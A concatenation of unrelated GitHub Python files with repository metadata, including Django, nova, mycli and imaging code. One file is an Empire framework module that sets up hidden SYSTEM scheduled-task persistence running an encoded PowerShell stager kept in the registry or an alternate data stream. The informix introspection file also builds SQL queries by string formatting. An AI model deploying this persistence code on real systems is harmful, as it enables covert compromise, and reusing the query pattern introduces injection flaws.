# 7000: 5e-06,
# 10000: 1e-06,
# 15000: 5e-07,
# 50000: 1e-07
},
do_save_activations=True,
auto_reshape=False
# plotter=MDNPlotter
)
"""
||||||||||
||||||||||
||||||||||
||||||||||
||||||||||
||||||||||
12345678901234567890
"""
def exp_a(name):
global source
    source_dict_copy = deepcopy(source_dict)
    source = RealApplianceSource(**source_dict_copy)
net_dict_copy = deepcopy(net_dict)
net_dict_copy.update(dict(
experiment_name=name,
source=source
))
N = 512
NUM_FILTERS = 10
net_dict_copy['layers_config'] = [
{
'type': DimshuffleLayer,
'pattern': (0, 2, 1) # (batch, features, time)
},
{
'type': Conv1DLayer, # convolve over the time axis
'num_filters': NUM_FILTERS,
'filter_length': 10,
'stride': 2,
'nonlinearity': rectify,
'W': Normal(std=1/sqrt(N))
},
{
'type': DimshuffleLayer,
'pattern': (0, 2, 1) # back to (batch, time, features)
},
{
'type': DenseLayer,
'num_units': N // 2,
'W': Normal(std=1/sqrt((N / 2) * NUM_FILTERS)),
'nonlinearity': rectify
},
{
'type': DenseLayer,
'num_units': N // 2,
'W': Normal(std=1/sqrt(N / 2)),
'nonlinearity': rectify
},
{
'type': DenseLayer,
'num_units': N // 2,
'W': Normal(std=1/sqrt(N / 2)),
'nonlinearity': rectify
},
{
'type': ReshapeLayer,
'shape': (source.n_seq_per_batch * (source.seq_length // 2),
source.n_inputs)
},
{
'type': DenseLayer,
'num_units': source.n_outputs,
'W': Normal(std=1/sqrt(N / 2)),
'nonlinearity': T.nnet.softplus
}
]
net = Net(**net_dict_copy)
return net
def main():
# EXPERIMENTS = list('abcdefghijklmnopqrstuvwxyz')
EXPERIMENTS = list('a')
for experiment in EXPERIMENTS:
full_exp_name = NAME + experiment
func_call = init_experiment(PATH, experiment, full_exp_name)
logger = logging.getLogger(full_exp_name)
try:
net = eval(func_call)
run_experiment(net, epochs=None)
except KeyboardInterrupt:
logger.info("KeyboardInterrupt")
break
except Exception as exception:
logger.exception("Exception")
raise
finally:
logging.shutdown()
if __name__ == "__main__":
main()
|
{
"content_hash": "c40dbdd7d4cca0d1310cde5431bbc3ba",
"timestamp": "",
"source": "github",
"line_count": 204,
"max_line_length": 86,
"avg_line_length": 30.965686274509803,
"alnum_prop": 0.5662498021212601,
"repo_name": "mmottahedi/neuralnilm_prototype",
"id": "32a34bb0c1fb3838f3a616d6f8b0e1c7f5534a1c",
"size": "6317",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "scripts/e339.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "4536723"
}
],
"symlink_target": ""
}
|
from nova.openstack.common import importutils
from nova.openstack.common import log as logging
LOG = logging.getLogger(__name__)
class VFS(object):
@staticmethod
def instance_for_image(imgfile, imgfmt, partition):
LOG.debug(_("Instance for image imgfile=%(imgfile)s "
"imgfmt=%(imgfmt)s partition=%(partition)s"),
{'imgfile': imgfile, 'imgfmt': imgfmt,
'partition': partition})
hasGuestfs = False
try:
LOG.debug(_("Trying to import guestfs"))
importutils.import_module("guestfs")
hasGuestfs = True
except Exception:
pass
if hasGuestfs:
LOG.debug(_("Using primary VFSGuestFS"))
return importutils.import_object(
"nova.virt.disk.vfs.guestfs.VFSGuestFS",
imgfile, imgfmt, partition)
else:
LOG.debug(_("Falling back to VFSLocalFS"))
return importutils.import_object(
"nova.virt.disk.vfs.localfs.VFSLocalFS",
imgfile, imgfmt, partition)
"""
The VFS class defines an interface for manipulating files within
a virtual disk image filesystem. This allows file injection code
to avoid the assumption that the virtual disk image can be mounted
in the host filesystem.
All paths provided to the APIs in this class should be relative
to the root of the virtual disk image filesystem. Subclasses
will translate paths as required by their implementation.
"""
def __init__(self, imgfile, imgfmt, partition):
self.imgfile = imgfile
self.imgfmt = imgfmt
self.partition = partition
"""
Perform any one-time setup tasks to make the virtual
filesystem available to future API calls
"""
def setup(self):
pass
"""
Release all resources initialized in the setup method
"""
def teardown(self):
pass
"""
    Create a directory @path, including all intermediate
path components if they do not already exist
"""
def make_path(self, path):
pass
"""
Append @content to the end of the file identified
by @path, creating the file if it does not already
exist
"""
def append_file(self, path, content):
pass
"""
Replace the entire contents of the file identified
by @path, with @content, creating the file if it does
not already exist
"""
def replace_file(self, path, content):
pass
"""
Return the entire contents of the file identified
by @path
"""
def read_file(self, path):
pass
"""
Return a True if the file identified by @path
exists
"""
def has_file(self, path):
pass
"""
Set the permissions on the file identified by
@path to @mode. The file must exist prior to
this call.
"""
def set_permissions(self, path, mode):
pass
"""
Set the ownership on the file identified by
@path to the username @user and groupname @group.
Either of @user or @group may be None, in which case
the current ownership will be left unchanged. The
ownership must be passed in string form, allowing
subclasses to translate to uid/gid form as required.
The file must exist prior to this call.
"""
def set_ownership(self, path, user, group):
pass
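# Illustrative lifecycle (the concrete backend is chosen by
# instance_for_image() above; the image path and injected content are
# hypothetical):
#
#     vfs = VFS.instance_for_image('/tmp/disk.qcow2', 'qcow2', None)
#     vfs.setup()
#     try:
#         vfs.append_file('/etc/hosts', '10.0.0.1 example\n')
#     finally:
#         vfs.teardown()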
|
{
"content_hash": "ca969908e52b6222332c195bf49d763f",
"timestamp": "",
"source": "github",
"line_count": 117,
"max_line_length": 70,
"avg_line_length": 29.213675213675213,
"alnum_prop": 0.6208308952603862,
"repo_name": "qwefi/nova",
"id": "b6cff39fb6c657668418cdeced65cd849333bbee",
"size": "4037",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "nova/virt/disk/vfs/api.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "11596912"
},
{
"name": "Shell",
"bytes": "17148"
}
],
"symlink_target": ""
}
|
from django.db.backends.base.introspection import BaseDatabaseIntrospection, FieldInfo
# From the JDBC Informix driver
SQ_TYPE_BYTE = 11
SQ_TYPE_CHAR = 0
SQ_TYPE_DATE = 7
SQ_TYPE_DATETIME = 10
SQ_TYPE_REAL = 4
SQ_TYPE_SMFLOAT = 4
SQ_TYPE_DECIMAL = 5
SQ_TYPE_NUMERIC = 5
SQ_TYPE_FLOAT = 3
SQ_TYPE_DOUBLE = 3
SQ_TYPE_INTEGER = 2
SQ_TYPE_MONEY = 8
SQ_TYPE_INTERVAL = 14
SQ_TYPE_SERIAL = 6
SQ_TYPE_SMALLINT = 1
SQ_TYPE_TEXT = 12
SQ_TYPE_VARCHAR = 13
SQ_TYPE_MASK = 31
class DatabaseIntrospection(BaseDatabaseIntrospection):
# Map type codes to Django Field types.
data_types_reverse = {
SQ_TYPE_BYTE: 'BinaryField',
SQ_TYPE_CHAR: 'CharField',
SQ_TYPE_DATE: 'DateField',
SQ_TYPE_DATETIME: 'DateTimeField',
SQ_TYPE_REAL: 'FloatField',
SQ_TYPE_SMFLOAT: 'FloatField',
SQ_TYPE_DECIMAL: 'DecimalField',
SQ_TYPE_NUMERIC: 'DecimalField',
SQ_TYPE_FLOAT: 'FloatField',
SQ_TYPE_DOUBLE: 'FloatField',
SQ_TYPE_INTEGER: 'IntegerField',
SQ_TYPE_MONEY: '??',
SQ_TYPE_INTERVAL: '??',
SQ_TYPE_SERIAL: 'AutoField',
SQ_TYPE_SMALLINT: 'SmallIntegerField',
SQ_TYPE_TEXT: 'TextField',
SQ_TYPE_VARCHAR: 'CharField',
SQ_TYPE_MASK: '??',
}
def get_table_list(self, cursor):
cursor.execute('SELECT tabname FROM systables')
return [x[0] for x in cursor.fetchall()]
def get_table_description(self, cursor, table_name, identity_check=True):
cursor.execute("SELECT c.* FROM syscolumns c, systables t WHERE c.tabid=t.tabid and tabname='%s'" % table_name)
        columns = [[c[0], c[3] % 256, None, c[4], c[4], None,
                    0 if c[3] > 256 else 1] for c in cursor.fetchall()]
items = []
for column in columns:
if column[1] in [SQ_TYPE_NUMERIC, SQ_TYPE_DECIMAL]:
column[4] = int(column[3]/256)
column[5] = column[3] - column[4]*256
items.append(FieldInfo(*column))
return items
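    # Worked example of the syscolumns encoding decoded above (hypothetical
    # column): a DECIMAL(6,2) is stored with collength = 6 * 256 + 2 = 1538,
    # so precision = 1538 // 256 = 6 and scale = 1538 - 6 * 256 = 2.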
def get_key_columns(self, cursor, table_name):
relations = []
cursor.execute("""
SELECT col1.colname as column_name, t2.tabname, col2.colname as referenced_column
FROM syscolumns col1, sysindexes idx1, sysconstraints const1, systables t1, syscolumns col2,
sysindexes idx2, sysconstraints const2, sysreferences ref, systables t2
WHERE col1.tabid=idx1.tabid
AND col1.colno=idx1.part1
AND idx1.idxname=const1.idxname
AND const1.tabid=t1.tabid
AND const1.constrtype='R'
AND col2.tabid=idx2.tabid
AND col2.colno=idx2.part1
AND idx2.idxname=const2.idxname
AND const2.constrid=ref.primary
AND ref.constrid = const1.constrid
AND t2.tabid=idx2.tabid
AND t1.tabname = '%s'
""" % table_name)
relations.extend(cursor.fetchall())
return relations
def get_indexes(self, cursor, table_name):
""" This query retrieves each index on the given table, including the
first associated field name """
cursor.execute("""select c1.colname, i1.idxtype,
(select constrtype from sysconstraints where idxname=i1.idxname) as pkey
FROM sysindexes i1, syscolumns c1
WHERE i1.tabid=c1.tabid AND i1.part1=c1.colno
AND i1.part2 = 0 and i1.tabid = (select tabid from systables where tabname='%s')""" % table_name)
indexes = {}
for row in cursor.fetchall():
indexes[row[0]] = {
'primary_key': True if row[2] == 'P' else False,
'unique': True if row[1] == 'U' else False
}
return indexes
def __get_col_index(self, cursor, schema, table_name, col_name):
"""Private method. Getting Index position of column by its name"""
cursor.execute("""SELECT colno
FROM syscolumns
WHERE colname='%s'
AND tabid=(SELECT tabid FROM systables
WHERE tabname='%s')""" %(col_name, table_name))
        return int(cursor.fetchone()[0]) - 1
def get_relations(self, cursor, table_name):
"""
Returns a dictionary of {field_index: (field_index_other_table, other_table)}
representing all relationships to the given table. Indexes are 0-based.
"""
relations = {}
kc_relations = self.get_key_columns(cursor, table_name)
for rel in kc_relations:
row0 = self.__get_col_index(cursor, None, table_name, rel[0])
row1 = self.__get_col_index(cursor, None, rel[1], rel[2])
row2 = rel[1]
relations[row0] = (row1, row2)
return relations
#TODO: Just copied
def get_constraints(self, cursor, table_name):
constraints = {}
schema = cursor.connection.get_current_schema()
sql = "SELECT CONSTNAME, COLNAME FROM SYSCAT.COLCHECKS WHERE TABSCHEMA='%(schema)s' AND TABNAME='%(table)s'" % {'schema': schema.upper(), 'table': table_name.upper()}
cursor.execute(sql)
for constname, colname in cursor.fetchall():
if constname not in constraints:
constraints[constname] = {
'columns': [],
'primary_key': False,
'unique': False,
'foreign_key': None,
'check': True,
'index': False
}
constraints[constname]['columns'].append(colname.lower())
sql = "SELECT KEYCOL.CONSTNAME, KEYCOL.COLNAME FROM SYSCAT.KEYCOLUSE KEYCOL INNER JOIN SYSCAT.TABCONST TABCONST ON KEYCOL.CONSTNAME=TABCONST.CONSTNAME WHERE TABCONST.TABSCHEMA='%(schema)s' and TABCONST.TABNAME='%(table)s' and TABCONST.TYPE='U'" % {'schema': schema.upper(), 'table': table_name.upper()}
cursor.execute(sql)
for constname, colname in cursor.fetchall():
if constname not in constraints:
constraints[constname] = {
'columns': [],
'primary_key': False,
'unique': True,
'foreign_key': None,
'check': False,
'index': True
}
constraints[constname]['columns'].append(colname.lower())
for pkey in cursor.connection.primary_keys(None, schema, table_name):
if pkey['PK_NAME'] not in constraints:
constraints[pkey['PK_NAME']] = {
'columns': [],
'primary_key': True,
'unique': False,
'foreign_key': None,
'check': False,
'index': True
}
constraints[pkey['PK_NAME']]['columns'].append(pkey['COLUMN_NAME'].lower())
for fk in cursor.connection.foreign_keys( True, schema, table_name ):
if fk['FK_NAME'] not in constraints:
constraints[fk['FK_NAME']] = {
'columns': [],
'primary_key': False,
'unique': False,
'foreign_key': (fk['PKTABLE_NAME'].lower(), fk['PKCOLUMN_NAME'].lower()),
'check': False,
'index': False
}
constraints[fk['FK_NAME']]['columns'].append(fk['FKCOLUMN_NAME'].lower())
if fk['PKCOLUMN_NAME'].lower() not in constraints[fk['FK_NAME']]['foreign_key']:
fkeylist = list(constraints[fk['FK_NAME']]['foreign_key'])
fkeylist.append(fk['PKCOLUMN_NAME'].lower())
constraints[fk['FK_NAME']]['foreign_key'] = tuple(fkeylist)
for index in cursor.connection.indexes( True, schema, table_name ):
if index['INDEX_NAME'] not in constraints:
constraints[index['INDEX_NAME']] = {
'columns': [],
'primary_key': False,
'unique': False,
'foreign_key': None,
'check': False,
'index': True
}
elif constraints[index['INDEX_NAME']]['unique'] :
continue
elif constraints[index['INDEX_NAME']]['primary_key']:
continue
constraints[index['INDEX_NAME']]['columns'].append(index['COLUMN_NAME'].lower())
return constraints
|
{
"content_hash": "fe08bdba2cf15924da51d86ebfc877ef",
"timestamp": "",
"source": "github",
"line_count": 200,
"max_line_length": 310,
"avg_line_length": 42.79,
"alnum_prop": 0.5493105865856509,
"repo_name": "nutztherookie/django-informix",
"id": "0b16b0a2389af5a822286ec6c364d1cece055ba9",
"size": "8558",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/django_informix/introspection.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "20929"
}
],
"symlink_target": ""
}
|
"""
This defines how to edit help entries in Admin.
"""
from django import forms
from django.contrib import admin
from evennia.help.models import HelpEntry
class HelpEntryForm(forms.ModelForm):
"Defines how to display the help entry"
class Meta:
model = HelpEntry
fields = '__all__'
db_help_category = forms.CharField(label="Help category", initial='General',
help_text="organizes help entries in lists")
    db_lock_storage = forms.CharField(label="Locks", initial='view:all()', required=False,
widget=forms.TextInput(attrs={'size':'40'}),)
class HelpEntryAdmin(admin.ModelAdmin):
    "Sets up the admin manager for help entries"
list_display = ('id', 'db_key', 'db_help_category', 'db_lock_storage')
list_display_links = ('id', 'db_key')
search_fields = ['^db_key', 'db_entrytext']
ordering = ['db_help_category', 'db_key']
save_as = True
save_on_top = True
list_select_related = True
form = HelpEntryForm
fieldsets = (
(None, {'fields':(('db_key', 'db_help_category'),
'db_entrytext', 'db_lock_storage'),
                      'description':"Sets a Help entry. Set lock to <i>view:all()</i> unless you want to restrict it."}),)
admin.site.register(HelpEntry, HelpEntryAdmin)
|
{
"content_hash": "086e5c70001072750bb372ac533c0505",
"timestamp": "",
"source": "github",
"line_count": 39,
"max_line_length": 116,
"avg_line_length": 34.794871794871796,
"alnum_prop": 0.6123802505526897,
"repo_name": "emergebtc/muddery",
"id": "cffc14784d03c0166b846f971539d106af4f6c9b",
"size": "1357",
"binary": false,
"copies": "5",
"ref": "refs/heads/master",
"path": "evennia/evennia/help/admin.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "38409"
},
{
"name": "Emacs Lisp",
"bytes": "2734"
},
{
"name": "HTML",
"bytes": "36949"
},
{
"name": "JavaScript",
"bytes": "143672"
},
{
"name": "Python",
"bytes": "2319628"
}
],
"symlink_target": ""
}
|
import os
from lib.common import helpers
class Module:
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'Invoke-Schtasks',
'Author': ['@mattifestation', '@harmj0y'],
'Description': ('Persist a stager (or script) using schtasks running as SYSTEM. This has a moderate detection/removal rating.'),
'Background' : False,
'OutputExtension' : None,
'NeedsAdmin' : True,
'OpsecSafe' : False,
'Language' : 'powershell',
'MinLanguageVersion' : '2',
'Comments': [
'https://github.com/mattifestation/PowerSploit/blob/master/Persistence/Persistence.psm1'
]
}
# any options needed by the module, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Agent' : {
'Description' : 'Agent to run module on.',
'Required' : True,
'Value' : ''
},
'Listener' : {
'Description' : 'Listener to use.',
'Required' : False,
'Value' : ''
},
'DailyTime' : {
'Description' : 'Daily time to trigger the script (HH:mm).',
'Required' : False,
'Value' : '09:00'
},
'IdleTime' : {
'Description' : 'User idle time (in minutes) to trigger script.',
'Required' : False,
'Value' : ''
},
'OnLogon' : {
'Description' : 'Switch. Trigger script on user logon.',
'Required' : False,
'Value' : ''
},
'TaskName' : {
'Description' : 'Name to use for the schtask.',
'Required' : True,
'Value' : 'Updater'
},
'RegPath' : {
'Description' : 'Registry location to store the script code. Last element is the key name.',
'Required' : False,
'Value' : 'HKLM:\Software\Microsoft\Network\debug'
},
'ADSPath' : {
'Description' : 'Alternate-data-stream location to store the script code.',
'Required' : False,
'Value' : ''
},
'ExtFile' : {
'Description' : 'Use an external file for the payload instead of a stager.',
'Required' : False,
'Value' : ''
},
'Cleanup' : {
'Description' : 'Switch. Cleanup the trigger and any script from specified location.',
'Required' : False,
'Value' : ''
},
'UserAgent' : {
'Description' : 'User-agent string to use for the staging request (default, none, or other).',
'Required' : False,
'Value' : 'default'
},
'Proxy' : {
'Description' : 'Proxy to use for request (default, none, or other).',
'Required' : False,
'Value' : 'default'
},
'ProxyCreds' : {
'Description' : 'Proxy credentials ([domain\]username:password) to use for request (default, none, or other).',
'Required' : False,
'Value' : 'default'
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self, obfuscate=False, obfuscationCommand=""):
listenerName = self.options['Listener']['Value']
# trigger options
dailyTime = self.options['DailyTime']['Value']
idleTime = self.options['IdleTime']['Value']
onLogon = self.options['OnLogon']['Value']
taskName = self.options['TaskName']['Value']
# storage options
regPath = self.options['RegPath']['Value']
adsPath = self.options['ADSPath']['Value']
# management options
extFile = self.options['ExtFile']['Value']
cleanup = self.options['Cleanup']['Value']
# staging options
userAgent = self.options['UserAgent']['Value']
proxy = self.options['Proxy']['Value']
proxyCreds = self.options['ProxyCreds']['Value']
statusMsg = ""
locationString = ""
# for cleanup, remove any script from the specified storage location
# and remove the specified trigger
if cleanup.lower() == 'true':
if adsPath != '':
# remove the ADS storage location
if ".txt" not in adsPath:
print helpers.color("[!] For ADS, use the form C:\\users\\john\\AppData:blah.txt")
return ""
script = "Invoke-Command -ScriptBlock {cmd /C \"echo x > "+adsPath+"\"};"
else:
# remove the script stored in the registry at the specified reg path
path = "\\".join(regPath.split("\\")[0:-1])
name = regPath.split("\\")[-1]
script = "$RegPath = '"+regPath+"';"
script += "$parts = $RegPath.split('\\');"
script += "$path = $RegPath.split(\"\\\")[0..($parts.count -2)] -join '\\';"
script += "$name = $parts[-1];"
script += "$null=Remove-ItemProperty -Force -Path $path -Name $name;"
script += "schtasks /Delete /F /TN "+taskName+";"
script += "'Schtasks persistence removed.'"
if obfuscate:
script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
return script
if extFile != '':
# read in an external file as the payload and build a
# base64 encoded version as encScript
if os.path.exists(extFile):
f = open(extFile, 'r')
fileData = f.read()
f.close()
# unicode-base64 encode the script for -enc launching
encScript = helpers.enc_powershell(fileData)
statusMsg += "using external file " + extFile
else:
print helpers.color("[!] File does not exist: " + extFile)
return ""
else:
# if an external file isn't specified, use a listener
if not self.mainMenu.listeners.is_listener_valid(listenerName):
# not a valid listener, return nothing for the script
print helpers.color("[!] Invalid listener: " + listenerName)
return ""
else:
# generate the PowerShell one-liner with all of the proper options set
launcher = self.mainMenu.stagers.generate_launcher(listenerName, language='powershell', encode=True, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds)
encScript = launcher.split(" ")[-1]
statusMsg += "using listener " + listenerName
if adsPath != '':
# store the script in the specified alternate data stream location
if ".txt" not in adsPath:
print helpers.color("[!] For ADS, use the form C:\\users\\john\\AppData:blah.txt")
return ""
script = "Invoke-Command -ScriptBlock {cmd /C \"echo "+encScript+" > "+adsPath+"\"};"
locationString = "$(cmd /c \''\''more < "+adsPath+"\''\''\'')"
else:
# otherwise store the script into the specified registry location
path = "\\".join(regPath.split("\\")[0:-1])
name = regPath.split("\\")[-1]
statusMsg += " stored in " + regPath
script = "$RegPath = '"+regPath+"';"
script += "$parts = $RegPath.split('\\');"
script += "$path = $RegPath.split(\"\\\")[0..($parts.count -2)] -join '\\';"
script += "$name = $parts[-1];"
script += "$null=Set-ItemProperty -Force -Path $path -Name $name -Value "+encScript+";"
# note where the script is stored
locationString = "(gp "+path+" "+name+")."+name
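            # e.g. (hypothetical, with the default RegPath value above):
            # locationString -> "(gp HKLM:\Software\Microsoft\Network debug).debug"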
        # build the command that will be triggered by the schtask
triggerCmd = "'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\powershell.exe -NonI -W hidden -c \\\"IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String("+locationString+")))\\\"'"
# sanity check to make sure we haven't exceeded the cmd.exe command length max
if len(triggerCmd) > 259:
print helpers.color("[!] Warning: trigger command exceeds the maximum of 259 characters.")
return ""
if onLogon != '':
script += "schtasks /Create /F /RU system /SC ONLOGON /TN "+taskName+" /TR "+triggerCmd+";"
statusMsg += " with "+taskName+" OnLogon trigger."
elif idleTime != '':
script += "schtasks /Create /F /RU system /SC ONIDLE /I "+idleTime+" /TN "+taskName+" /TR "+triggerCmd+";"
statusMsg += " with "+taskName+" idle trigger on " + idleTime + "."
else:
# otherwise assume we're doing a daily trigger
script += "schtasks /Create /F /RU system /SC DAILY /ST "+dailyTime+" /TN "+taskName+" /TR "+triggerCmd+";"
statusMsg += " with "+taskName+" daily trigger at " + dailyTime + "."
script += "'Schtasks persistence established "+statusMsg+"'"
if obfuscate:
script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
return script
|
{
"content_hash": "fc82f1c2ceac95db29766c82c8a7ba88",
"timestamp": "",
"source": "github",
"line_count": 245,
"max_line_length": 203,
"avg_line_length": 42.220408163265304,
"alnum_prop": 0.4947795823665893,
"repo_name": "drshellface/Empire",
"id": "3f130c0e437caed1d909449a708226b368ed7671",
"size": "10344",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "lib/modules/powershell/persistence/elevated/schtasks.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "1966"
},
{
"name": "Java",
"bytes": "496"
},
{
"name": "Objective-C",
"bytes": "2664"
},
{
"name": "PHP",
"bytes": "2041"
},
{
"name": "PowerShell",
"bytes": "16082240"
},
{
"name": "Python",
"bytes": "2734314"
},
{
"name": "Shell",
"bytes": "7945"
}
],
"symlink_target": ""
}
|
from .tabulate import _text_type
import binascii
def pad(field, total, char=u" "):
return field + (char * (total - len(field)))
def get_separator(num, header_len, data_len):
sep = u"***************************[ %d. row ]***************************\n" % (num + 1)
return sep
def format_field(value):
    # Return the field as a text type; if it cannot be decoded as ASCII,
    # return a hexified representation instead.
try:
if isinstance(value, bytes):
return _text_type(value, "ascii")
else:
return _text_type(value)
except UnicodeDecodeError:
return _text_type('0x' + binascii.hexlify(value).decode('ascii'))
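# Illustrative sketch (not part of the original module):
#   format_field(42)          -> u'42'
#   format_field(b'\xff\xfe') -> u'0xfffe'  (non-ASCII bytes get hexified)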
def expanded_table(rows, headers):
header_len = max([len(x) for x in headers])
max_row_len = 0
results = []
padded_headers = [pad(x, header_len) + u" |" for x in headers]
header_len += 2
for row in rows:
        # Substitute the <null> marker up front; None would otherwise be
        # stringified by format_field and a later None check could never fire.
        row = [u'<null>' if x is None else format_field(x) for x in row]
row_len = max([len(x) for x in row])
row_result = []
if row_len > max_row_len:
max_row_len = row_len
for header, value in zip(padded_headers, row):
row_result.append(u"%s %s" % (header, value))
results.append('\n'.join(row_result))
output = []
for i, result in enumerate(results):
output.append(get_separator(i, header_len, max_row_len))
output.append(result)
output.append('\n')
return ''.join(output)
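# Illustrative usage (not part of the original module; sample data is made up,
# and the package context must be importable for the relative import above):
#   expanded_table([(1, u'alice')], ['id', 'name']) produces
#   ***************************[ 1. row ]***************************
#   id   | 1
#   name | alice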
|
{
"content_hash": "fe278800887a887ed05cd90fccc6c4e7",
"timestamp": "",
"source": "github",
"line_count": 49,
"max_line_length": 92,
"avg_line_length": 29.918367346938776,
"alnum_prop": 0.5593451568894953,
"repo_name": "mdsrosa/mycli",
"id": "128e9c690ce0d78d9ed614899c51da8c624ce63a",
"size": "1466",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "mycli/packages/expanded.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "223317"
},
{
"name": "Shell",
"bytes": "529"
}
],
"symlink_target": ""
}
|
import numpy as np
import functools
import scipy.interpolate
from . import _transforms
def requires_transform(func):
@functools.wraps(func)
def wrapper(self, *args, **kwargs):
if self.transform is None:
raise ValueError("No transform set for {} object {}".format(type(self), self))
return func(self, *args, **kwargs)
return wrapper
class ImageBase(np.ndarray):
"""
numpy.ndarray subclass with an affine transform associated with it
"""
def __new__(cls, input_array, transform=None):
# input_array is an already formed ndarray
# we want to make it our class type
obj = np.asarray(input_array).view(cls)
if transform is not None:
obj.transform = transform.copy()
return obj
def __array_finalize__(self, obj):
self.transform = getattr(obj, 'transform', None)
@requires_transform
def to_scanner(self, *args):
"""
Converts a 3d position in ImageBase space to the scanner
reference space. Argument can either be 3 individual floats
for x, y and z or a numpy array_like with final dimension of
size 3.
Raises a ValueError if no transform is set.
Parameters
----------
x : float
The x coordinate of the point
y : float
The y coordinate of the point
z : float
The z coordinate of the point
Returns
-------
numpy.ndarray
The transformed 3d point in scanner coordinates
"""
positions = _transforms.normalise_positions_for_transform(*args)
transformed_point = np.einsum("ij,...j", self.transform, positions)
return np.squeeze(np.asarray(transformed_point))[..., 0:3]
@requires_transform
def from_scanner(self, *args):
"""
Converts a 3d position in scanner space to the ImageBase
reference space. Argument can either be 3 individual floats
for x, y and z or a numpy array_like with final dimension of
size 3.
Raises a ValueError if no transform is set.
Parameters
----------
x : float
The x coordinate of the point
y : float
The y coordinate of the point
z : float
The z coordinate of the point
Returns
-------
numpy.ndarray
The transformed 3d point in ImageBase coordinates
"""
positions = _transforms.normalise_positions_for_transform(*args)
transformed_point = np.einsum("ij,...j",
np.linalg.inv(self.transform),
positions)
return np.squeeze(np.asarray(transformed_point))[..., 0:3]
@property
@requires_transform
def voxel_size(self):
"""
The dimensions of a voxel.
Returns
-------
numpy.ndarray
The dimensions of a voxel along each axis.
"""
return np.linalg.norm(self.transform, axis=0)[0:3]
@property
@requires_transform
def position(self):
"""
The centre of the ImageBase in scanner coordinates.
"""
return self.transform[:3, 3]
@property
@requires_transform
def slice_vector(self):
return self.transform[:3, 2] / np.linalg.norm(self.transform[:3, 2])
@property
@requires_transform
def row_vector(self):
return self.transform[:3, 0] / np.linalg.norm(self.transform[:3, 0])
@property
@requires_transform
def col_vector(self):
return self.transform[:3, 1] / np.linalg.norm(self.transform[:3, 1])
@requires_transform
def _closest_axis(self, target_axis):
voxel_axes = self.transform[:3, :3] / self.voxel_size
overlap = np.abs(np.dot(target_axis, voxel_axes))
return self.transform[:3, np.argmax(overlap)]
@property
@requires_transform
def axial_vector(self):
"""
Returns the image axis which is most closely aligned with the axial
direction. The returned vector is guaranteed to point in the positive
axial direction, even if the original volume vector is in the
opposite direction.
Returns
-------
numpy.ndarray
The most axial image axis
"""
# dot the three candidate vectors with (0, 0, 1)
best_axis = self._closest_axis((0, 0, 1))
norm_axis = best_axis / np.linalg.norm(best_axis)
# work out if we need to reverse the direction
return norm_axis if norm_axis[2] > 0 else -1 * norm_axis
@property
@requires_transform
def coronal_vector(self):
"""
Returns the image axis which is most closely aligned with the coronal
direction. The returned vector is guaranteed to point in the positive
coronal direction, even if the original volume vector is in the
opposite direction.
Returns
-------
numpy.ndarray
The most coronal image axis
"""
# dot the three candidate vectors with (0, 1, 0)
best_axis = self._closest_axis((0, 1, 0))
norm_axis = best_axis / np.linalg.norm(best_axis)
return norm_axis if norm_axis[1] > 0 else -1 * norm_axis
@property
@requires_transform
def sagittal_vector(self):
"""
Returns the image axis which is most closely aligned with the sagittal
direction. The returned vector is guaranteed to point in the positive
sagittal direction, even if the original volume vector is in the
opposite direction.
Returns
-------
numpy.ndarray
The most sagittal image axis
"""
# dot the three candidate vectors with (1, 0, 0)
best_axis = self._closest_axis((1, 0, 0))
norm_axis = best_axis / np.linalg.norm(best_axis)
return norm_axis if norm_axis[0] > 0 else -1 * norm_axis
@property
@requires_transform
def centre(self):
"""
Returns the centre of the image volume in scanner coordinates.
Returns
-------
numpy.ndarray
The centre of the image volume
"""
return self.to_scanner((np.array(self.shape[::-1]) - 1) / 2)
@requires_transform
def resample(self,
row_vector,
col_vector,
shape,
centre=(0, 0, 0),
voxel_size=(1, 1, 1),
method='linear'):
"""
Create a new volume by resampling this one using a different coordinate
system.
Parameters
----------
row_vector: array
Row direction vector for new volume
col_vector: array
Column direction vector for new volume
shape: array
The shape of the new volume, as slices, rows, columns
centre: array
The position of the centre of the new volume in scanner
coordinates, in mm
voxel_size: array
The size of each voxel in the new volume, in mm
method: str
The interpolation method to use - either "linear" or "nearest"
Returns
-------
suspect.base.ImageBase
The resampled volume
"""
# make sure row_vector and col_vector are normalised
row_vector = np.asanyarray(row_vector) / np.linalg.norm(row_vector)
col_vector = np.asanyarray(col_vector) / np.linalg.norm(col_vector)
# mgrid produces 3D index grids for the x, y and z coords separately
II, JJ, KK = np.mgrid[0:shape[2],
0:shape[1],
0:shape[0]].astype(np.float)
# shift the indices from the corner to the centre
II -= (shape[2] - 1) / 2
JJ -= (shape[1] - 1) / 2
KK -= (shape[0] - 1) / 2
# scale the indices by the size of the voxel
II *= voxel_size[0]
JJ *= voxel_size[1]
KK *= voxel_size[2]
slice_vector = np.cross(row_vector, col_vector)
# combine the x, y and z indices with the row, col and slice vectors
# to get the spatial coordinates at each point in the new volume
space_coords = II[..., np.newaxis] * row_vector \
+ JJ[..., np.newaxis] * col_vector \
+ KK[..., np.newaxis] * slice_vector + centre
image_coords = self.from_scanner(space_coords).reshape(*space_coords.shape)[..., ::-1].astype(np.int)
